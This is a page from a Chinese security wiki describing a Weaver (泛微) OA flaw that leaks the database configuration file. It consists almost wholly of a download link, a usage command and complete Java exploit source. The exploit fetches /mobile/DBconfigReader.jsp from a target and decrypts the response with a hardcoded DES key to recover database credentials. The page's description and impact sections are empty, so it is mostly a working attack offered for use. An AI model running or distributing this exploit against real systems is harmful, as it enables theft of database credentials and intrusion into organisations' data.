menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right yougar0.github.io(基于零组公开漏洞库 + PeiQi文库的一些漏洞)-20210715 chevron_right Web安全 chevron_right 泛微oa chevron_right 泛微OA 数据库配置文件读取.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    泛微OA 数据库配置文件读取.md
    2.68 KB / 2021-04-21 09:23:46
        泛微OA 数据库配置文件读取
    =========================
    
    一、漏洞简介
    ------------
    
    二、漏洞影响
    ------------
    
    三、复现过程
    ------------
    
    `https://download.0-sec.org/Web安全/泛微OA/ecologyExp.jar-master.zip`
    
    使用方式:
    
    jdk 1.8以上,没混淆可以直接看源码
    
    使用方法:
    
    java -jar ecologyExp.jar http://0-sec.org
    
    源代码如下,编译好的在上方github链接里。
    
        package com.test;
    
        import org.apache.http.HttpEntity;
        import org.apache.http.client.methods.CloseableHttpResponse;
        import org.apache.http.client.methods.HttpGet;
        import org.apache.http.impl.client.CloseableHttpClient;
        import org.apache.http.impl.client.HttpClientBuilder;
        import org.apache.http.util.EntityUtils;
    
        import javax.crypto.Cipher;
        import javax.crypto.SecretKey;
        import javax.crypto.SecretKeyFactory;
        import javax.crypto.spec.DESKeySpec;
        import java.security.SecureRandom;
    
        public class ReadDbConfig {
            private final static String DES = "DES";
            private final static String key = "1z2x3c4v5b6n";
    
            public static void main(String[] args) throws Exception {
                if(args[0]!=null&& args[0].length() !=0){
                    String url = args[0]+"/mobile/DBconfigReader.jsp";
                    System.out.println(ReadConfig(url));
                }else{
                    System.err.print("use: java -jar ecologyExp  http://127.0.0.1");
                }
            }
    
            private static String ReadConfig(String url) throws Exception {
                CloseableHttpClient httpClient = HttpClientBuilder.create().build();
                HttpGet httpGet = new HttpGet(url);
                CloseableHttpResponse response = httpClient.execute(httpGet);
                HttpEntity responseEntity = response.getEntity();
    
                byte[] res1 = EntityUtils.toByteArray(responseEntity);
    
                byte[] data = subBytes(res1,10,res1.length-10);
    
                byte [] finaldata =decrypt(data,key.getBytes());
    
                return (new String(finaldata));
            }
    
            private static byte[] decrypt(byte[] data, byte[] key) throws Exception {
    
                SecureRandom sr = new SecureRandom();
                DESKeySpec dks = new DESKeySpec(key);
                SecretKeyFactory keyFactory = SecretKeyFactory.getInstance(DES);
                SecretKey securekey = keyFactory.generateSecret(dks);
                Cipher cipher = Cipher.getInstance(DES);
                cipher.init(Cipher.DECRYPT_MODE, securekey, sr);
    
                return cipher.doFinal(data);
            }
    
            public static byte[] subBytes(byte[] src, int begin, int count) {
                byte[] bs = new byte[count];
                System.arraycopy(src, begin, bs, 0, count);
                return bs;
            }
    
        }
    
    
    links
    file_download